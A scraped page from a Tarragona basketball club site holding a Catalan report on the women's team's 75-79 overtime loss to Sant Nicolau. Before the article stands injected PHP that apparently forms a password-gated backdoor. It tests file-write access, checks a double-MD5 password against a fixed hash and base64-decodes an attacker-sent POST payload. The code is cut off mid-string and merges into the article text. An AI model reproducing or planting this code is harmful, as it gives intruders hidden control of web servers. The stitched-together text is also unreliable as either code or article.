function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Tarragona Fem Bàsquet no pot aturar la visitant Viana i perd contra el Sant Nicolau a la pròrroga (75-79) - Tgn Bàsquet Club -

El Tarragona Fem Bàsquet no pot aturar la visitant Viana i perd contra el Sant Nicolau a la pròrroga (75-79)

Updated: març 19, 2016

En el que va ser, possiblement, el millor partit de bàsquet que s’ha vist al pavelló del Sagrat Cor aquesta temporada, el Tarragona Fem Bàsquet va perdre a la pròrroga contra el Sant Nicolau, un rival directe per evitar el descens. El conjunt visitant, que arribava a Tarragona amb les mateixes victòries que l’equip lila (4), va demostrar ser un os i va convertir el partit en una lluita sense treva des del segon període.

Arrecerat sota el potencial físic de jugadores com Bonet, Vergé o Viana, el Sant Nicolau va dur el partit al contacte, al cos a cos al pal baix, i en va sortir guanyador. Carregant fort el rebot ofensiu i, sobretot, ficant pilotes a Viana, les visitants van capgirar la dinàmica d’un partit que els era desfavorable. El matx, però, va tenir moltes alternatives. Excepte el primer període, de clar domini local, la resta va estar marcada per l’equilibri, tot i que el Tarragona Fem Bàsquet va ser qui va gaudir dels avantatges més grans. Però les tarragonines van fallar massa en un enfrontament on cada error es va pagar car.

El Sant Nicolau va sobreviure a la primera meitat gràcies als triples —els quatre que va anotar en tot el matx— i, a partir del descans i més concretament a mesura que passaven els minuts, gràcies als tirs lliures. Aquí hi ha la segona clau de la derrota lila. L’estadística ho diu ben clar: 13/25 pel Tarragona Fem Bàsquet i un excel·lent 25/28 per les visitants.En un matx amb tant de contacte, on les pivots van jugar fort, cada personal era or. El Sant Nicolau va trobar un filó en la línia de tirs lliures, el Tarragona Fem Bàsquet un via crucis.

El malson lila. Viana va ser el màxim exponent del joc visitant. Va defensar Fouty i, tot que la nord-americana va fer un partidàs —34 de valoració— també va tenir molts problemes per aturar la seva rival. Viana va ser un malson i el Sant Nicolau la va buscar constantment en els moments calents. De fet, va jugar el mateix rol que Fouty en el bàndol local. Va ser un duel extraordinari i el partit va guanyar en qualitat i emoció a cada minut.

Inici esperançador. El Tarragona Fem Bàsquet va començar molt bé, aprofitant l’atenció de la defensa rival sobre les dues jugadores nord-americanes de l’equip lila, Livy Fouty i Stephanie Douglas, les jugadores que entrena Albert del Rey van trobar en Ona Fort el seu principal estilet. Fort, una autèntica especialista a moure’s sense pilota i aprofitar els espais, va rebre una assistència rere una altra i, d’aquesta manera, el seu equip manava per una màxima diferència de 8 punts (18-10, 1:56 per finalitzar el primer quart). Les directores de joc locals van ser molt llestes també. Van veure els forats en la defensa del Sant Nicolau, que estava massa obert, focalitzant l’atenció en Fouty i Douglas, i van penetrar sempre cap a cistella. Tierno i Pascual van anar directes cap a barraca i d’això en van treure punts i faltes. Amb tot, el Tarragona Fem Bàsquet no va poder trencar el matx i va acabar el període amb una diferència de 5 punts (20-15).

En el segon període, les coses van canviar. L’atac no era tan fluïd, ja no s’ocupaven els espais com abans i el Sant Nicolau va trobar en el tir de mitja i llarga distància el remei a la seva inferioritat inicial. Tres triples visitants en aquest quart van capgirar la dinàmica del matx i les visitants van remuntar (22-26 a 5:26 pel descans). Amb l’entrada de Fouty novament a pista, el Tarragona Fem Bàsquet va tornar a agafar les regnes del matx (31-26 a 1:27 del descans), però el Sant Nicolau no havia dit l’última paraula i va deixar igualat el marcador al final del quart, 33-33.

El cos a cos. A partir de la segona meitat es va fer més evident el potencial físic del Sant Nicolau. Viana i Vergé carregaven amb força el rebot ofensiu i, d’aquesta manera, el Tarragona Fem Bàsquet no podia córrer sempre que volia. Amb tot, gràcies també a una gran Pascual, s’obria una escletxa (44-37 a 4:17 per acabar el tercer període), però el Sant Nicolau no es va posar nerviós. La sang freda de les visitants va ser decisiva per remuntar i, arran d’una tècnica a Anna Pocino, el resultat es va ajustar (44-45, 2:39 pel final del tercer quart). A partir d’aleshores, la igualtat va ser total. El Sant Nicolau semblava que volia marxar a l’inici de l’últim quart (50-53), però una reacció fulgurant local ho va impedir (65-59 a 3:20 per acabar). El Tarragona Fem Bàsquet va desaprofitar diferents atacs per mig sentenciar i el Sant Nicolau va tornar a igualar l’enfrontament. L’entrenadora visitant va situar una defensa en zona d’ajustaments que va descentrar l’equip lila i el partit es va jugar en dues accions. Amb 67 a 67 a l’electrònic, Pascual va fallar una penetració i, en la jugada següent, la pilota del Sant Nicolau va fer la corbata i va sortir del cèrcol. A la pròrroga el domini va ser visitant, tot i que sempre amb diferències mínimes. Els tirs lliures marcaven la pauta i les pilotes anaven a Viana, que anotava o rebia falta (73-77, a 24 segons pel final). El Tarragona Fem Bàsquet s’havia quedat sense arguments de perímetre malgrat el triple de Laura Vilamajor en el quart període i les pilotes anaven a les mans de Fouty. Va ser gairebé un cara o creu. Viana no va perdonar i els tirs lliures van dictar sentència. El Tarragona Fem Bàsquet continua sense saber què és guanyar dos partits seguits aquest curs.